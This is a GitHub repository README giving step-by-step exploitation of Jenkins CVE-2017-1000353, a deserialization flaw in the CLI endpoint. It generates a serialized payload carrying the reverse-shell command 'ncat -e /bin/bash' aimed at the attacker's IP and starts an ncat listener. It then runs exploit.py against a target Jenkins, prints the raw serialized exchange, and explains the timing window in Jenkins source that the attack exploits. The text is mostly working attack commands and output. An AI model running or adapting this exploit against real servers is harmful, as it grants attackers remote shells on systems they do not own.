Skip to content
Branch: master
Find file History
Latest commit 48d0709 May 11, 2017
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
.metadata
eclipse_project add Jenkins CVE-2017-1000353 May 10, 2017
vulnerable_jenkins_wars
CVE-2017-1000353.pcap
README.md
exploit.py
generate_java_serialization_data.sh

README.md

How to exploit jenkins with CVE-2017-100353 ?

  1. Generate a java serialization object
CVE-2017-1000353 ->> bash generate_java_serialization_data.sh
[*] Usage: generate_java_serialization_data.sh <os command>

CVE-2017-1000353 ->> bash generate_java_serialization_data.sh "ncat -e /bin/bash 192.168.206.1 4444"

CVE-2017-1000353 ->> ll
total 56
-rw-r--r--  1 security  staff   8.7K May 10 01:43 CVE-2017-1000353.pcap
drwxr-xr-x  8 security  staff   272B May  9 20:26 eclipse_project
-rw-r--r--  1 security  staff   4.0K May 10 01:56 exploit.py
-rw-r--r--@ 1 security  staff   204B May  9 23:20 generate_java_serialization_data.sh
-rw-r--r--  1 security  staff   2.4K May 10 01:57 java_serialization_data.bin
drwxr-xr-x  4 security  staff   136B May 10 01:44 vulnerable_jenkins_wars
CVE-2017-1000353 ->> python exploit.py
INFO:exploit.py:[*] python exploit.py <http://127.0.0.1:8080/cli>
  1. Start a listener, and wait for a shell session.
CVE-2017-1000353 ->> ncat -v -l -p 4444
  1. Exploit jenkins cli with CVE-2017-1000353
CVE-2017-1000353 ->> python exploit.py http://192.168.206.144:8080/cli java_serialization_data.bin
python exploit.py http://192.168.206.144:8080/cli java_serialization_data.bin
download - Starting new HTTP connection (1): 192.168.206.144
download - http://192.168.206.144:8080 "POST /cli HTTP/1.1" 200 None
upload - Starting new HTTP connection (1): 192.168.206.144
upload - http://192.168.206.144:8080 "POST /cli HTTP/1.1" 200 0
upload - b''
download - b'Starting HTTP duplex channel<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\xac\xed\x00\x05sr\x00\x1bhudson.remoting.UserRequest\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03L\x00\x10classLoaderProxyt\x000Lhudson/remoting/RemoteClassLoader$IClassLoader;[\x00\x07requestt\x00\x02[BL\x00\x08toStringt\x00\x12Ljava/lang/String;xr\x00\x17hudson.remoting.Request\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03I\x00\x02idI\x00\x08lastIoIdL\x00\x08responset\x00\x1aLhudson/remoting/Response;xr\x00\x17hudson.remoting.Command\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01L\x00\tcreatedAtt\x00\x15Ljava/lang/Exception;xpsr\x00\x1ehudson.remoting.Command$Source\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01L\x00\x06this$0t\x00\x19Lhudson/remoting/Command;xr\x00\x13java.lang.Exception\xd0\xfd\x1f>\x1a;\x1c\xc4\x02\x00\x00xr\x00\x13java.lang.Throwable\xd5\xc65\'9w\xb8\xcb\x03\x00\x04L\x00\x05causet\x00\x15Ljava/lang/Throwable;L\x00\rdetailMessageq\x00~\x00\x03[\x00\nstackTracet\x00\x1e[Ljava/lang/StackTraceElement;L\x00\x14suppressedExceptionst\x00\x10Ljava/util/List;xpq\x00~\x00\x10pur\x00\x1e[Ljava.lang.StackTraceElement;\x02F*<<\xfd"9\x02\x00\x00xp\x00\x00\x00\x07sr\x00\x1bjava.lang.StackTraceElementa\t\xc5\x9a&6\xdd\x85\x02\x00\x04I\x00\nlineNumberL\x00\x0edeclaringClassq\x00~\x00\x03L\x00\x08fileNameq\x00~\x00\x03L\x00\nmethodNameq\x00~\x00\x03xp\x00\x00\x00Ft\x00\x17hudson.remoting.Commandt\x00\x0cCommand.javat\x00\x06<init>sq\x00~\x00\x13\x00\x00\x005q\x00~\x00\x15q\x00~\x00\x16q\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x00ct\x00\x17hudson.remoting.Requestt\x00\x0cRequest.javaq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x00=t\x00\x1bhudson.remoting.UserRequestt\x00\x10UserRequest.javaq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x03Pt\x00\x17hudson.remoting.Channelt\x00\x0cChannel.javat\x00\tcallAsyncsq\x00~\x00\x13\x00\x00\x00jt\x00\x1ahudson.remoting.PingThreadt\x00\x0fPingThread.javat\x00\x04pingsq\x00~\x00\x13\x00\x00\x00Vq\x00~\x00$q\x00~\x00%t\x00\x03runsr\x00&java.util.Collections$UnmodifiableList\xfc\x0f%1\xb5\xec\x8e\x10\x02\x00\x01L\x00\x04listq\x00~\x00\x0fxr\x00,java.util.Collections$UnmodifiableCollection\x19B\x00\x80\xcb^\xf7\x1e\x02\x00\x01L\x00\x01ct\x00\x16Ljava/util/Collection;xpsr\x00\x13java.util.ArrayListx\x81\xd2\x1d\x99\xc7a\x9d\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x00w\x04\x00\x00\x00\x00xq\x00~\x00.xq\x00~\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00ps}\x00\x00\x00\x02\x00.hudson.remoting.RemoteClassLoader$IClassLoader\x00\x1chudson.remoting.IReadResolvexr\x00\x17java.lang.reflect.Proxy\xe1\'\xda \xcc\x10C\xcb\x02\x00\x01L\x00\x01ht\x00%Ljava/lang/reflect/InvocationHandler;xpsr\x00\'hudson.remoting.RemoteInvocationHandler\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05Z\x00\x14autoUnexportByCallerZ\x00\tgoingHomeI\x00\x03oidZ\x00\tuserProxyL\x00\x06originq\x00~\x00\rxp\x00\x00\x00\x00\x00\x02\x00sq\x00~\x00\x0bq\x00~\x005t\x00xProxy hudson.remoting.RemoteInvocationHandler@2 was created for interface hudson.remoting.RemoteClassLoader$IClassLoaderuq\x00~\x00\x11\x00\x00\x00\x08sq\x00~\x00\x13\x00\x00\x00~t\x00\'hudson.remoting.RemoteInvocationHandlert\x00\x1cRemoteInvocationHandler.javaq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x00\x8aq\x00~\x009q\x00~\x00:t\x00\x04wrapsq\x00~\x00\x13\x00\x00\x02\x88q\x00~\x00 q\x00~\x00!t\x00\x06exportsq\x00~\x00\x13\x00\x00\x02\xd4t\x00!hudson.remoting.RemoteClassLoadert\x00\x16RemoteClassLoader.javaq\x00~\x00>sq\x00~\x00\x13\x00\x00\x00Gq\x00~\x00\x1dq\x00~\x00\x1eq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x03Pq\x00~\x00 q\x00~\x00!q\x00~\x00"sq\x00~\x00\x13\x00\x00\x00jq\x00~\x00$q\x00~\x00%q\x00~\x00&sq\x00~\x00\x13\x00\x00\x00Vq\x00~\x00$q\x00~\x00%q\x00~\x00(q\x00~\x00,xxur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x00>\xac\xed\x00\x05sr\x00\x1fhudson.remoting.PingThread$Ping\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00w\x08\xff\xff\xff\xfe\x00\x00\x00\x02xpt\x00\'hudson.remoting.PingThread$Ping@135ed23y'

Notice:

If you want to exploit CVE-2017-1000353 successfully, please make sure that time bewteen download and upload must be less than wait(1000);. Code as follow:

$ grep -A 20 "public synchronized void download" ./core/src/main/java/hudson/model/FullDuplexHttpChannel.java
    public synchronized void download(StaplerRequest req, StaplerResponse rsp) throws InterruptedException, IOException {
        rsp.setStatus(HttpServletResponse.SC_OK);

        // server->client channel.
        // this is created first, and this controls the lifespan of the channel
        rsp.addHeader("Transfer-Encoding", "chunked");
        OutputStream out = rsp.getOutputStream();
        if (DIY_CHUNKING) out = new ChunkedOutputStream(out);

        // send something out so that the client will see the HTTP headers
        out.write("Starting HTTP duplex channel".getBytes());
        out.flush();

        {// wait until we have the other channel
            long end = System.currentTimeMillis() + CONNECTION_TIMEOUT;
            while (upload == null && System.currentTimeMillis()<end)
                wait(1000);         ********************** Bingo ************************

            if (upload==null)
                throw new IOException("HTTP full-duplex channel timeout: "+uuid);
        }
You can’t perform that action at this time.